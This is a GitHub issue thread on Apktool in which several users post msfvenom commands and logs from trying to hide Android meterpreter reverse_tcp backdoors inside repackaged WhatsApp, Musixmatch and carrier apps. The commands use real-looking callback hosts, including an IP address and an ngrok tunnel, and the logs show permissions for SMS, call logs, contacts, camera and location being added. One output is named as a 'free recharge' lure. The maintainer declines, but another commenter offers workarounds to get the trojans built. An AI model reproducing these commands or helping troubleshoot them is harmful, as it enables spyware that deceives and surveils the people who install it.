### ISSUE TITLE
Error: Unable to rebuild apk with apktool

### ISSUE THREAD

**Issue by ProsAnon** [iBotPeaches/Apktool#1707]
I am using apktool v 2.3.1. on Kali Linux.

I get this error. Yesterday I have tried and it worked, today I get this error with any APK, tried at least 10.

"
Using APK template: Whatsappo.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.whatsapp.zumvr
[*] Loading /tmp/d20180110-6408-1ej4cd4/original/smali/com/whatsapp/AppShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Rebuilding Whatsappo.apk with meterpreter injection as /tmp/d20180110-6408-1ej4cd4/output.apk
Error: Unable to rebuild apk with apktool

"

**Comment by iBotPeaches** [comment]
Unfortunately apktool seems to be packaged into a 3rd party application here using apktool to pack some payload into an application. The reason for the build failure is not including in this stacktrace so nothing I can do here. 

Thanks for the report, but not enough details here for me to investigate.

**Comment by ProsAnon** [comment]
What details do you need? I will provide because I really need to get this fixed

**Comment by iBotPeaches** [comment]
Generally every bit of details that the issue template requests. You removed it and just posted a stacktrace of a 3rd party tool that didn't even expose the stacktrace from Apktool. So generally useless for me. I would report this to whatever tool this is.

**Comment by ProsAnon** [comment]
I am really sorry, I'm in a hurry.

msfvenom -x Whatsappo.apk -p android/meterpreter/reverse_tcp LHOST=MY IPLPORT=6666 -o W.apk
Using APK template: Whatsappo.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.whatsapp.megzx
[*] Loading /tmp/d20180110-6779-18jmnct/original/smali/com/whatsapp/AppShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Rebuilding Whatsappo.apk with meterpreter injection as /tmp/d20180110-6779-18jmnct/output.apk
Error: Unable to rebuild apk with apktool
root@kali:~/Desktop/MSF/Original APKS#

**Comment by rootech1** [comment]
how to fix this error
msfvenom -x /root/Desktop/Musixmatch.apk -p android/meterpreter/reverse_tcp LHOST=197.231.43.178 LPORT=6060 -o /root/Desktop/Musixmatchreload.apk

Using APK template: /root/Desktop/Musixmatch.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.musixmatch.android.lyrify.pnriw
[*] Loading /tmp/d20180528-4429-p0wqf6/original/smali/o/abm.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Rebuilding /root/Desktop/Musixmatch.apk with meterpreter injection as /tmp/d20180528-4429-p0wqf6/output.apk
Error: Unable to rebuild apk with apktool

**Comment by lophi22** [comment]
really . is there no solution

**Comment by black15** [comment]
Error: Unable to rebuild apk with apktool

**Comment by fedi966** [comment]
any one have a solution?

**Comment by AshkanRafiee** [comment]
here you can solve the problem as i answered this question on stackoverflow:
[Link To The Answer On Stack Over Flow](https://stackoverflow.com/questions/52433758/unable-to-rebuild-apk-with-apktool-kali-linux/52545982#52545982)

**Comment by moonwolf63x** [comment]
Error: Unable to rebuild apk with apktool my apktool is already updated

**Comment by sandesh1430** [comment]
I too have the same error
root@kali:~/Downloads# msfvenom -x myidea.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11568 -o /root/Desktop/myideafreerecharge.apk
Using APK template: myidea.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.ideacellular.myidea.qwpse
[*] Loading /tmp/d20181112-9095-1hglxlh/original/smali/com/ideacellular/myidea/MyIdeaApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Rebuilding myidea.apk with meterpreter injection as /tmp/d20181112-9095-1hglxlh/output.apk
Error: Unable to rebuild apk with apktool




my apktool is updated to latest version 2.3.4

**Comment by AshkanRafiee** [comment]
i have updated the answer on StackOverflow Follow The mentioned link again.

**Comment by sandesh1430** [comment]
> i have updated the answer on StackOverflow Follow The mentioned link again.

already tried but not working

**Comment by AshkanRafiee** [comment]
> > i have updated the answer on StackOverflow Follow The mentioned link again.
> 
> already tried but not working

what didn't work ? did u injected manually and rebuilt your apk using "android studio" ?

**Comment by sandesh1430** [comment]
> I too have the same error
> root@kali:~/Downloads# msfvenom -x myidea.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11560 -o /root/Desktop/myideafreerecharge.apk
> Using APK template: myidea.apk
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> [_] Creating signing key and keystore.. [_] Decompiling original APK..
> [_] Decompiling payload APK.. [_] Locating hook point..
> [_] Adding payload as package com.ideacellular.myidea.qwpse [_] Loading /tmp/d20181112-9095-1hglxlh/original/smali/com/ideacellular/myidea/MyIdeaApplication.smali and injecting payload..
> [_] Poisoning the manifest with meterpreter permissions.. [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [*] Rebuilding myidea.apk with meterpreter injection as /tmp/d20181112-9095-1hglxlh/output.apk
> Error: Unable to rebuild apk with apktool
> 
> my apktool is updated to latest version 2.3.4


i have updated my apktool by following ur steps
and installed zipalign
and tried my process as above 
still getting the same error

**Comment by AshkanRafiee** [comment]
> > I too have the same error
> > root@kali:~/Downloads# msfvenom -x myidea.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11560 -o /root/Desktop/myideafreerecharge.apk
> > Using APK template: myidea.apk
> > [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> > [-] No arch selected, selecting arch: dalvik from the payload
> > [_] Creating signing key and keystore.. [_] Decompiling original APK..
> > [_] Decompiling payload APK.. [_] Locating hook point..
> > [_] Adding payload as package com.ideacellular.myidea.qwpse [_] Loading /tmp/d20181112-9095-1hglxlh/original/smali/com/ideacellular/myidea/MyIdeaApplication.smali and injecting payload..
> > [_] Poisoning the manifest with meterpreter permissions.. [_] Adding
> > [_] Adding [_] Adding
> > [_] Adding [_] Adding
> > [_] Adding [_] Adding
> > [*] Rebuilding myidea.apk with meterpreter injection as /tmp/d20181112-9095-1hglxlh/output.apk
> > Error: Unable to rebuild apk with apktool
> > my apktool is updated to latest version 2.3.4
> 
> i have updated my apktool by following ur steps [#1707 (comment)](https://github.com/iBotPeaches/Apktool/issues/1707#issuecomment-437953446)
> and installed zipalign
> and tried my process as above
> still getting the same error

as i said in "In The End" Part , if you still having the rebuilding problem , it's because of apktool that cannot rebuild large apk files , use another tool for rebuilding your apk file and inject your files manually also.

**Comment by sandesh1430** [comment]
another tools???

**Comment by sandesh1430** [comment]
> > > I too have the same error
> > > root@kali:~/Downloads# msfvenom -x myidea.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11560 -o /root/Desktop/myideafreerecharge.apk
> > > Using APK template: myidea.apk
> > > [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> > > [-] No arch selected, selecting arch: dalvik from the payload
> > > [_] Creating signing key and keystore.. [_] Decompiling original APK..
> > > [_] Decompiling payload APK.. [_] Locating hook point..
> > > [_] Adding payload as package com.ideacellular.myidea.qwpse [_] Loading /tmp/d20181112-9095-1hglxlh/original/smali/com/ideacellular/myidea/MyIdeaApplication.smali and injecting payload..
> > > [_] Poisoning the manifest with meterpreter permissions.. [_] Adding
> > > [_] Adding [_] Adding
> > > [_] Adding [_] Adding
> > > [_] Adding [_] Adding
> > > [*] Rebuilding myidea.apk with meterpreter injection as /tmp/d20181112-9095-1hglxlh/output.apk
> > > Error: Unable to rebuild apk with apktool
> > > my apktool is updated to latest version 2.3.4
> > 
> > 
> > i have updated my apktool by following ur steps [#1707 (comment)](https://github.com/iBotPeaches/Apktool/issues/1707#issuecomment-437953446)
> > and installed zipalign
> > and tried my process as above
> > still getting the same error
> 
> as i said in "In The End" Part , if you still having the rebuilding problem , it's because of apktool that cannot rebuild large apk files, use lower size apk file (<5MB) or use another tool for rebuilding your apk file and inject your Codes or files manually also.

same problem when using 1.3 mb file
